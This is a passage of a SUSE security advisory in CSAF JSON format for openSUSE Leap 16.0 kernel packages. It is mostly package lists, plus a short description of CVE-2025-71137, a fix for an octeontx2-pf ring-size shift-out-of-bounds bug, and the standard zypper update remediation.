"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
